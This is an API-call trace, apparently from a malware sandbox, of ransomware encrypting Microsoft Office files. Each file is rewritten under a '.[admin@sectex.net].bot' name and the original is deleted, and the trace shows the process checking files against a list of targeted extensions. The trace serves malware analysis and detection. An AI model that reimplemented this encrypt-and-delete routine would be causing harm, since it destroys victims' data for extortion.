	[0142.329] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.329] SetEndOfFile (hFile=0x3d0) returned 1
	[0142.333] CloseHandle (hObject=0x3d0) returned 1
	[0142.333] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.333] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\technic.eftx")) returned 1
	[0142.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79
	[0142.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79
	[0142.334] lstrlenW (lpString=".doc") returned 4
	[0142.334] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.334] lstrlenW (lpString=".docx") returned 5
	[0142.334] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.334] lstrlenW (lpString=".pdf") returned 4
	[0142.334] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.334] lstrlenW (lpString=".xls") returned 4
	[0142.334] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.334] lstrlenW (lpString=".xlsx") returned 5
	[0142.334] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.334] lstrlenW (lpString=".ppt") returned 4
	[0142.334] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79
	[0142.334] lstrlenW (lpString=".zip") returned 4
	[0142.334] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.334] lstrlenW (lpString=".rar") returned 4
	[0142.334] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.334] lstrlenW (lpString=".bz2") returned 4
	[0142.334] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.334] lstrlenW (lpString=".7z") returned 3
	[0142.334] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79
	[0142.334] lstrlenW (lpString=".dbf") returned 4
	[0142.334] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79
	[0142.334] lstrlenW (lpString=".1cd") returned 4
	[0142.334] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79
	[0142.334] lstrlenW (lpString=".jpg") returned 4
	[0142.334] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79
	[0142.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79
	[0142.335] lstrlenW (lpString=".doc") returned 4
	[0142.335] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.335] lstrlenW (lpString=".docx") returned 5
	[0142.335] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.335] lstrlenW (lpString=".pdf") returned 4
	[0142.335] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.335] lstrlenW (lpString=".xls") returned 4
	[0142.335] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.335] lstrlenW (lpString=".xlsx") returned 5
	[0142.335] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.335] lstrlenW (lpString=".ppt") returned 4
	[0142.335] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79
	[0142.335] lstrlenW (lpString=".zip") returned 4
	[0142.335] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.335] lstrlenW (lpString=".rar") returned 4
	[0142.335] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.335] lstrlenW (lpString=".bz2") returned 4
	[0142.335] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.335] lstrlenW (lpString=".7z") returned 3
	[0142.335] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79
	[0142.335] lstrlenW (lpString=".dbf") returned 4
	[0142.335] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79
	[0142.335] lstrlenW (lpString=".1cd") returned 4
	[0142.335] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned 79
	[0142.335] lstrlenW (lpString=".jpg") returned 4
	[0142.335] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.335] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0142.336] lstrlenW (lpString="Thatch.eftx") returned 11
	[0142.336] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0142.336] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=41295) returned 1
	[0142.337] CloseHandle (hObject=0x3d0) returned 1
	[0142.337] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx")) returned 0x20
	[0142.337] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.337] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0142.337] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.337] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.337] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0142.338] GetLastError () returned 0x0
	[0142.338] ReadFile (in: hFile=0x3d0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xa14f, lpOverlapped=0x0) returned 1
	[0142.389] WriteFile (in: hFile=0x3c0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xa150, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xa150, lpOverlapped=0x0) returned 1
	[0142.390] ReadFile (in: hFile=0x3d0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.390] WriteFile (in: hFile=0x3c0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0142.390] SetEndOfFile (hFile=0x3c0) returned 1
	[0142.487] CloseHandle (hObject=0x3c0) returned 1
	[0142.487] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.487] SetEndOfFile (hFile=0x3d0) returned 1
	[0142.679] CloseHandle (hObject=0x3d0) returned 1
	[0142.679] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.693] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx")) returned 1
	[0142.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78
	[0142.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78
	[0142.694] lstrlenW (lpString=".doc") returned 4
	[0142.694] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.694] lstrlenW (lpString=".docx") returned 5
	[0142.694] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.694] lstrlenW (lpString=".pdf") returned 4
	[0142.694] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.694] lstrlenW (lpString=".xls") returned 4
	[0142.694] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.694] lstrlenW (lpString=".xlsx") returned 5
	[0142.694] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.695] lstrlenW (lpString=".ppt") returned 4
	[0142.695] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78
	[0142.695] lstrlenW (lpString=".zip") returned 4
	[0142.695] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.695] lstrlenW (lpString=".rar") returned 4
	[0142.695] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.695] lstrlenW (lpString=".bz2") returned 4
	[0142.695] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.695] lstrlenW (lpString=".7z") returned 3
	[0142.695] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78
	[0142.695] lstrlenW (lpString=".dbf") returned 4
	[0142.695] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78
	[0142.695] lstrlenW (lpString=".1cd") returned 4
	[0142.695] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78
	[0142.695] lstrlenW (lpString=".jpg") returned 4
	[0142.695] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78
	[0142.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78
	[0142.695] lstrlenW (lpString=".doc") returned 4
	[0142.695] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.695] lstrlenW (lpString=".docx") returned 5
	[0142.695] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.695] lstrlenW (lpString=".pdf") returned 4
	[0142.695] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.695] lstrlenW (lpString=".xls") returned 4
	[0142.695] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.695] lstrlenW (lpString=".xlsx") returned 5
	[0142.695] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.695] lstrlenW (lpString=".ppt") returned 4
	[0142.696] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78
	[0142.696] lstrlenW (lpString=".zip") returned 4
	[0142.696] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.696] lstrlenW (lpString=".rar") returned 4
	[0142.696] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.696] lstrlenW (lpString=".bz2") returned 4
	[0142.696] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.696] lstrlenW (lpString=".7z") returned 3
	[0142.696] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78
	[0142.696] lstrlenW (lpString=".dbf") returned 4
	[0142.696] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78
	[0142.696] lstrlenW (lpString=".1cd") returned 4
	[0142.696] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78
	[0142.696] lstrlenW (lpString=".jpg") returned 4
	[0142.696] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.696] lstrcmpiW (lpString1=".MML", lpString2=".bot") returned 1
	[0142.696] lstrlenW (lpString="CAGCAT10.MML") returned 12
	[0142.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0142.697] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=312400) returned 1
	[0142.697] CloseHandle (hObject=0x39c) returned 1
	[0142.697] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml")) returned 0x20
	[0142.697] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.697] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0142.697] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.697] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.697] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0143.537] GetLastError () returned 0x0
	[0143.537] ReadFile (in: hFile=0x39c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x4c450, lpOverlapped=0x0) returned 1
	[0143.559] WriteFile (in: hFile=0x3c0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x4c460, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x4c460, lpOverlapped=0x0) returned 1
	[0143.564] ReadFile (in: hFile=0x39c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.564] WriteFile (in: hFile=0x3c0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.565] SetEndOfFile (hFile=0x3c0) returned 1
	[0143.565] CloseHandle (hObject=0x3c0) returned 1
	[0143.565] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.565] SetEndOfFile (hFile=0x39c) returned 1
	[0143.624] CloseHandle (hObject=0x39c) returned 1
	[0143.625] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.625] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml")) returned 1
	[0143.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66
	[0143.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66
	[0143.625] lstrlenW (lpString=".doc") returned 4
	[0143.625] lstrcmpiW (lpString1=".doc", lpString2=".MML") returned -1
	[0143.625] lstrlenW (lpString=".docx") returned 5
	[0143.625] lstrcmpiW (lpString1=".docx", lpString2="0.MML") returned -1
	[0143.625] lstrlenW (lpString=".pdf") returned 4
	[0143.625] lstrcmpiW (lpString1=".pdf", lpString2=".MML") returned 1
	[0143.625] lstrlenW (lpString=".xls") returned 4
	[0143.625] lstrcmpiW (lpString1=".xls", lpString2=".MML") returned 1
	[0143.626] lstrlenW (lpString=".xlsx") returned 5
	[0143.626] lstrcmpiW (lpString1=".xlsx", lpString2="0.MML") returned -1
	[0143.626] lstrlenW (lpString=".ppt") returned 4
	[0143.626] lstrcmpiW (lpString1=".ppt", lpString2=".MML") returned 1
	[0143.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66
	[0143.626] lstrlenW (lpString=".zip") returned 4
	[0143.626] lstrcmpiW (lpString1=".zip", lpString2=".MML") returned 1
	[0143.626] lstrlenW (lpString=".rar") returned 4
	[0143.626] lstrcmpiW (lpString1=".rar", lpString2=".MML") returned 1
	[0143.626] lstrlenW (lpString=".bz2") returned 4
	[0143.626] lstrcmpiW (lpString1=".bz2", lpString2=".MML") returned -1
	[0143.626] lstrlenW (lpString=".7z") returned 3
	[0143.626] lstrcmpiW (lpString1=".7z", lpString2="MML") returned -1
	[0143.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66
	[0143.626] lstrlenW (lpString=".dbf") returned 4
	[0143.626] lstrcmpiW (lpString1=".dbf", lpString2=".MML") returned -1
	[0143.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66
	[0143.626] lstrlenW (lpString=".1cd") returned 4
	[0143.626] lstrcmpiW (lpString1=".1cd", lpString2=".MML") returned -1
	[0143.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66
	[0143.626] lstrlenW (lpString=".jpg") returned 4
	[0143.626] lstrcmpiW (lpString1=".jpg", lpString2=".MML") returned -1
	[0143.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66
	[0143.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66
	[0143.626] lstrlenW (lpString=".doc") returned 4
	[0143.626] lstrcmpiW (lpString1=".doc", lpString2=".MML") returned -1
	[0143.626] lstrlenW (lpString=".docx") returned 5
	[0143.626] lstrcmpiW (lpString1=".docx", lpString2="0.MML") returned -1
	[0143.626] lstrlenW (lpString=".pdf") returned 4
	[0143.626] lstrcmpiW (lpString1=".pdf", lpString2=".MML") returned 1
	[0143.626] lstrlenW (lpString=".xls") returned 4
	[0143.626] lstrcmpiW (lpString1=".xls", lpString2=".MML") returned 1
	[0143.627] lstrlenW (lpString=".xlsx") returned 5
	[0143.627] lstrcmpiW (lpString1=".xlsx", lpString2="0.MML") returned -1
	[0143.627] lstrlenW (lpString=".ppt") returned 4
	[0143.627] lstrcmpiW (lpString1=".ppt", lpString2=".MML") returned 1
	[0143.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66
	[0143.627] lstrlenW (lpString=".zip") returned 4
	[0143.627] lstrcmpiW (lpString1=".zip", lpString2=".MML") returned 1
	[0143.627] lstrlenW (lpString=".rar") returned 4
	[0143.627] lstrcmpiW (lpString1=".rar", lpString2=".MML") returned 1
	[0143.627] lstrlenW (lpString=".bz2") returned 4
	[0143.627] lstrcmpiW (lpString1=".bz2", lpString2=".MML") returned -1
	[0143.627] lstrlenW (lpString=".7z") returned 3
	[0143.627] lstrcmpiW (lpString1=".7z", lpString2="MML") returned -1
	[0143.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66
	[0143.627] lstrlenW (lpString=".dbf") returned 4
	[0143.627] lstrcmpiW (lpString1=".dbf", lpString2=".MML") returned -1
	[0143.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66
	[0143.627] lstrlenW (lpString=".1cd") returned 4
	[0143.627] lstrcmpiW (lpString1=".1cd", lpString2=".MML") returned -1
	[0143.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66
	[0143.627] lstrlenW (lpString=".jpg") returned 4
	[0143.627] lstrcmpiW (lpString1=".jpg", lpString2=".MML") returned -1
	[0143.627] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0143.627] lstrlenW (lpString="CERTINTL.DLL") returned 12
	[0143.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\certintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0143.647] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=12176) returned 1
	[0143.647] CloseHandle (hObject=0x3cc) returned 1
	[0143.647] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\certintl.dll")) returned 0x20
	[0143.648] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\certintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.648] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\certintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0143.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60
	[0143.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60
	[0143.648] lstrlenW (lpString=".doc") returned 4
	[0143.648] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0143.648] lstrlenW (lpString=".docx") returned 5
	[0143.648] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0143.648] lstrlenW (lpString=".pdf") returned 4
	[0143.648] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0143.648] lstrlenW (lpString=".xls") returned 4
	[0143.648] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0143.648] lstrlenW (lpString=".xlsx") returned 5
	[0143.648] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0143.648] lstrlenW (lpString=".ppt") returned 4
	[0143.648] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0143.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60
	[0143.648] lstrlenW (lpString=".zip") returned 4
	[0143.648] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0143.648] lstrlenW (lpString=".rar") returned 4
	[0143.648] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0143.648] lstrlenW (lpString=".bz2") returned 4
	[0143.648] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0143.648] lstrlenW (lpString=".7z") returned 3
	[0143.648] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0143.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60
	[0143.649] lstrlenW (lpString=".dbf") returned 4
	[0143.649] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0143.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60
	[0143.649] lstrlenW (lpString=".1cd") returned 4
	[0143.649] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0143.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60
	[0143.649] lstrlenW (lpString=".jpg") returned 4
	[0143.649] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
